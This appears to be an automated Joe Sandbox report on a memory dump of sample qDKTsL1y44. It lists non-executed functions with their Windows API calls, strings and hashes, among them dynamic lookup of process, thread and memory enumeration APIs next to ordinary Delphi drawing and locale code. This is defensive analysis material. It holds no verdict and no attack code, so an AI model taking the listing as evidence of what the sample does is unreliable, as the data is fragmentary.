Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 0cdc9ede0810c0f42f775f19c30c07cc6c0a463f78d1b1c9a430ec58032d6b88
Instruction ID: 095ce39a466e74553aa2175e40f2164f8e7ed01b0bdc72ef559540d51f4d4948
Opcode Fuzzy Hash: 0cdc9ede0810c0f42f775f19c30c07cc6c0a463f78d1b1c9a430ec58032d6b88
Instruction Fuzzy Hash: 1DE04FB93007017EE7101E7E5D84B666AD8EB48A65F1444A5F641DB241D770B84087A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04238820 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,04238AA7,?,?,04238B39,00000000,04238C15), ref: 04238834
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0423884C
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0423885E
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 04238870
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 04238882
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 04238894
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 042388A6
GetProcAddress.KERNEL32(00000000,Process32First), ref: 042388B8
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 042388CA
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 042388DC
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 042388EE
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 04238900
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 04238912
GetProcAddress.KERNEL32(00000000,Module32First), ref: 04238924
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 04238936
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 04238948
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0423895A

Strings

CreateToolhelp32Snapshot, xrefs: 04238844
Process32Next, xrefs: 042388C2
Heap32ListFirst, xrefs: 04238856
Process32NextW, xrefs: 042388E6
Module32Next, xrefs: 0423892E
Heap32First, xrefs: 0423887A
Process32FirstW, xrefs: 042388D4
Heap32Next, xrefs: 0423888C
kernel32.dll, xrefs: 0423882F
Thread32First, xrefs: 042388F8
Module32NextW, xrefs: 04238952
Toolhelp32ReadProcessMemory, xrefs: 0423889E
Heap32ListNext, xrefs: 04238868
Module32First, xrefs: 0423891C
Process32First, xrefs: 042388B0
Thread32Next, xrefs: 0423890A
Module32FirstW, xrefs: 04238940

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 1a63a79f3dff38bb8c1474280147246bb8f0d8649166a1f95e4e2b919a3b74a3
Instruction ID: df813370a654f3ca85807eeabbf50c12a8f0fd8e263b9700e3a90e4a60495efb
Opcode Fuzzy Hash: 1a63a79f3dff38bb8c1474280147246bb8f0d8649166a1f95e4e2b919a3b74a3
Instruction Fuzzy Hash: 203146F4B50B50AFEF00EBB9A8C9A7937F9EB1571A78005A5B414DF204D778A844CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 04204F7C Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 04204FFC
GetDC.USER32(00000000), ref: 0420500D
CreateCompatibleDC.GDI32(00000000), ref: 0420501E
CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0420506A
CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 0420508E
SelectObject.GDI32(?,?), ref: 042052EB
SelectPalette.GDI32(?,00000000,00000000), ref: 0420532B
RealizePalette.GDI32(?), ref: 04205337
SetTextColor.GDI32(?,00000000), ref: 042053A0
SetBkColor.GDI32(?,00000000), ref: 042053BA
SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,04205548,?,00000000,0420556A,?,00000000,0420557B), ref: 04205402
FillRect.USER32(?,?,00000000), ref: 04205388

Part of subcall function 04201CEC: GetSysColor.USER32(?), ref: 04201CF6

PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 04205424
CreateCompatibleDC.GDI32(00000028), ref: 04205437
SelectObject.GDI32(?,00000000), ref: 0420545A
SelectPalette.GDI32(?,00000000,00000000), ref: 04205476
RealizePalette.GDI32(?), ref: 04205481
SetTextColor.GDI32(?,00000000), ref: 0420549F
SetBkColor.GDI32(?,00000000), ref: 042054B9
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 042054E1
SelectPalette.GDI32(?,00000000,000000FF), ref: 042054F3
SelectObject.GDI32(?,00000000), ref: 042054FD
DeleteDC.GDI32(?), ref: 04205518

Part of subcall function 04202AA8: CreateBrushIndirect.GDI32(?), ref: 04202B53

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
String ID:
API String ID: 1299887459-0
Opcode ID: 1fb194d666bd1467f41075010cfd8e1fb7c56d8d7bc2c96337b9bd6eae84f527
Instruction ID: 12430151c562afb36591f5a4a08f5a3c1479a08b8f6e9d43644f21a20bca86cb
Opcode Fuzzy Hash: 1fb194d666bd1467f41075010cfd8e1fb7c56d8d7bc2c96337b9bd6eae84f527
Instruction Fuzzy Hash: 9A12C575A10209AFDB10EFA9C884FAEB7F9EF08314F558455F914EB292C775E980CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0423319C Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

vcltest3.dll, xrefs: 0423359D
RegisterAutomation, xrefs: 042335BE

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: 4b17d312b1b093411ac138c37fc07228bb47f6af705baf4ab5fcd83b0b3db227
Instruction ID: f10e77e84f55ad99a9a46c477bc0f75886e9ac8015fc4c2c77ed62124df94113
Opcode Fuzzy Hash: 4b17d312b1b093411ac138c37fc07228bb47f6af705baf4ab5fcd83b0b3db227
Instruction Fuzzy Hash: 33E14CB5B24205EFEB14DB68C584AADB7F2AF08316F1881A4EC159B251D774FF84DB40

Uniqueness

Uniqueness Score: -1.00%

Function 041E5C18 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5C35
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 041E5C4C
lstrcpynA.KERNEL32(?,?,?), ref: 041E5C7C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5CE0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5D16
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5D29
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5D3B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5D47
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,041E7A18,041E0000), ref: 041E5D7B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,041E7A18), ref: 041E5D87
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 041E5DA9

Strings

GetLongPathNameA, xrefs: 041E5C43
\, xrefs: 041E5D59
kernel32.dll, xrefs: 041E5C30

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: e8bcbd5276da79a5c2f76d385ea63728e8a48939d94f7c9a99f0559d72045b73
Instruction ID: f1ac4cea465b38ed2fec0694d470c749f3345514dcdad0c2473be078a5c6e8fc
Opcode Fuzzy Hash: e8bcbd5276da79a5c2f76d385ea63728e8a48939d94f7c9a99f0559d72045b73
Instruction Fuzzy Hash: F6416F7AD00A59BFDB10DEEACCC8AFEB3FEAF48208F1445A5A545D7201D770EA408B50

Uniqueness

Uniqueness Score: -1.00%

Function 0422FCD8 Relevance: 20.0, APIs: 13, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 7163c54551ce115ae2e0f6db87e25021bd4a95b59174a3b0f18429d70d1f8986
Instruction ID: f88b4203fb8e2a1fdbb92b4c3c2c69e68c9587b7d8952e8bad537efa9ae6a67b
Opcode Fuzzy Hash: 7163c54551ce115ae2e0f6db87e25021bd4a95b59174a3b0f18429d70d1f8986
Instruction Fuzzy Hash: 60026A75B24254EFEB50DFACCA84BAC77F4AB04315F1600E0E904AB2A6DB75BE40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 041E5EE8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 041E5EF8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 041E5F05
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 041E5F0B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 041E5F36
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 041E5F7D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 041E5F8D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 041E5FB5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 041E5FC5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 041E5FEB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 041E5FFB

Strings

Software\Borland\Delphi\Locales, xrefs: 041E5E48
Software\Borland\Locales, xrefs: 041E5E0C, 041E5E2A

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
Instruction ID: 6cc3c0b4e7a52e50d3ed697c053f01cc09fd79f981947326313dba5fff362115
Opcode Fuzzy Hash: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
Instruction Fuzzy Hash: BA31B779E0065D39FB25D9F9CCC6FFE7BAD5B04344F8405E19104E6181D774AE448B50

Uniqueness

Uniqueness Score: -1.00%

Function 0422224C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0422225B
GetWindowPlacement.USER32(?,0000002C), ref: 04222278
GetWindowRect.USER32(?), ref: 04222291
GetWindowLongA.USER32(?,000000F0), ref: 0422229F
GetWindowLongA.USER32(?,000000F8), ref: 042222B4
ScreenToClient.USER32(00000000), ref: 042222C1
ScreenToClient.USER32(00000000,?), ref: 042222CC

Strings

,, xrefs: 04222264

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
Instruction ID: a3a7e66ed2ee806cbca208711a6d7f4523a8c9902aa973be97b086ee3841ffaf
Opcode Fuzzy Hash: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
Instruction Fuzzy Hash: ED11B275600711AFEB10DFADC9C4A9B77D8AF49314F044A65BE68DB396D732E800CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04213E00 Relevance: 10.9, APIs: 7, Instructions: 405COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 042140D0
RestoreDC.GDI32(?,?), ref: 04214144
GetWindowDC.USER32(?,00000000,04214334), ref: 042141BE
SaveDC.GDI32(?), ref: 042141F5
RestoreDC.GDI32(?,?), ref: 04214262
DefWindowProcA.USER32(?,?,?,?,00000000,04214334), ref: 04214316

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: RestoreSaveWindow$Proc
String ID:
API String ID: 1975259465-0
Opcode ID: f67e05821bd963aed480277344e29e36f6ba376f388858ddcaf5f6bf7af2011d
Instruction ID: b01a9322f47b5f90776b9417569323d96de7dc50c9a7715bb9c60515d337f0f7
Opcode Fuzzy Hash: f67e05821bd963aed480277344e29e36f6ba376f388858ddcaf5f6bf7af2011d
Instruction Fuzzy Hash: 06E12974B1060A9FEB10EF69C8809AEF7F5FF68314B2586A5E904A7260D774FD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0422C508 Relevance: 10.8, APIs: 7, Instructions: 332windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000), ref: 0422C5CF
SaveDC.GDI32(?), ref: 0422C78D
RestoreDC.GDI32(?,?), ref: 0422C7FE
GetWindowDC.USER32(00000000), ref: 0422C86A
SaveDC.GDI32(?), ref: 0422C8A1
RestoreDC.GDI32(?,?), ref: 0422C905

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: RestoreSave$FocusWindow
String ID:
API String ID: 1553564791-0
Opcode ID: 86bd510873e61b5bc4de8d7c59a08a86fb9a52c1ee43b66f7784ae2a74cd5dda
Instruction ID: 8f5818dc71b38d5d0d25ee39d1bfd92e3d1076ad26ef4c65b5ca6615b5120afd
Opcode Fuzzy Hash: 86bd510873e61b5bc4de8d7c59a08a86fb9a52c1ee43b66f7784ae2a74cd5dda
Instruction Fuzzy Hash: EFC17C31B20125EFDB11DF6AC689ABEB7F5EB49304F1544A1E804AB2A0DB30FE41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 04233990 Relevance: 9.1, APIs: 6, Instructions: 89windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 04233998
SetActiveWindow.USER32(?,?,?,?,04233392,00000000,04233866), ref: 042339A9
IsWindowEnabled.USER32(00000000), ref: 042339CC
DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,04233392,00000000,04233866), ref: 042339E5
SetWindowPos.USER32(?,00000000,00000000,?,?,04233392,00000000,04233866), ref: 04233A2B
SetFocus.USER32(00000000,?,00000000,00000000,?,?,04233392,00000000,04233866), ref: 04233A79

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$ActiveEnabledFocusIconicProc
String ID:
API String ID: 848842217-0
Opcode ID: 2910b53872a8078e633c70364d23161e29436252dca00d09635fd31b195f9591
Instruction ID: 69c08366f3d4af342ef29c2d3394238e7af8f892d078bf373819fb39c988584c
Opcode Fuzzy Hash: 2910b53872a8078e633c70364d23161e29436252dca00d09635fd31b195f9591
Instruction Fuzzy Hash: 483119B1720241ABFB24EF69CDC5B6937B8AF0470AF0814A1AE44DF2D6D7B5F9848714

Uniqueness

Uniqueness Score: -1.00%

Function 04221920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0422195F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0422197D
GetWindowPlacement.USER32(?,0000002C), ref: 042219B3
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 042219D7

Strings

,, xrefs: 042219A1

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
Instruction ID: 17885eccd97867d3502e4daa6855f6dab2c249b1e1e9d6769fcea3000d5eea6a
Opcode Fuzzy Hash: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
Instruction Fuzzy Hash: ED215C71710224ABDF14EF69C9C09AA77A8AF09314F008465FE18DF206D772F904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 042338CC Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 042338D3
SetActiveWindow.USER32(?,?,?,04233385,00000000,04233866), ref: 042338EB

Part of subcall function 04232F58: EnumWindows.USER32(Function_00052EE8,00000000), ref: 04232F82
Part of subcall function 04232F58: ShowOwnedPopups.USER32(00000000,?), ref: 04232FB1

IsWindowEnabled.USER32(00000000), ref: 04233917
SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,04233385,00000000,04233866), ref: 0423394A
DefWindowProcA.USER32(?,00000112,0000F020,00000000,?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,04233385), ref: 0423395F

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
String ID:
API String ID: 2995439034-0
Opcode ID: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
Instruction ID: 187d6f393418455311651944aafb13bdab5935af92249cfa528dcbe3aae5930c
Opcode Fuzzy Hash: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
Instruction Fuzzy Hash: 8011FEB07206419BEB64EF6DCEC5F5537A86F04309F4800A4BE14DF19AD775F9408714

Uniqueness

Uniqueness Score: -1.00%

Function 0420AEA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

MonitorFromWindow, xrefs: 0420AEB7

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: 0ce0643778b7b5796c5b5423184f63cc329f3c54202591f10bdf7ad158a55e71
Instruction ID: 614ec94657455ca47daaf3d5036fc6c685cf928c2faf10221e9e7af427c6c2a6
Opcode Fuzzy Hash: 0ce0643778b7b5796c5b5423184f63cc329f3c54202591f10bdf7ad158a55e71
Instruction Fuzzy Hash: AB01A972B206185BAB14EE949C849FF73DCDF15264BC48021F811A72C2DB79BD41D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 041FA27C Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 041FA293
LoadResource.KERNEL32(?,041FA318,?,?,?,041F5D70,?,00000001,00000000,?,041FA1BE,00000000,?), ref: 041FA2AD
SizeofResource.KERNEL32(?,041FA318,?,041FA318,?,?,?,041F5D70,?,00000001,00000000,?,041FA1BE,00000000,?), ref: 041FA2C7
LockResource.KERNEL32(041F9E88,00000000,?,041FA318,?,041FA318,?,?,?,041F5D70,?,00000001,00000000,?,041FA1BE,00000000), ref: 041FA2D1

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
Instruction ID: 31df8f65a51434ef5a13e37f8a7c7d5fd4593cf4e45dedb2cf2a074ca4a6a795
Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
Instruction Fuzzy Hash: EEF04BB66046046F6748EFADACC0D6B73ECEE982A4350405AFA0CCB205DB35ED028364

Uniqueness

Uniqueness Score: -1.00%

Function 042559D6 Relevance: 5.1, Strings: 2, Instructions: 2575COMMON

Download Yara Rule

Strings

c, xrefs: 042578C1
, xrefs: 04257DFA

Memory Dump Source

Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID: $c
API String ID: 0-3797896886
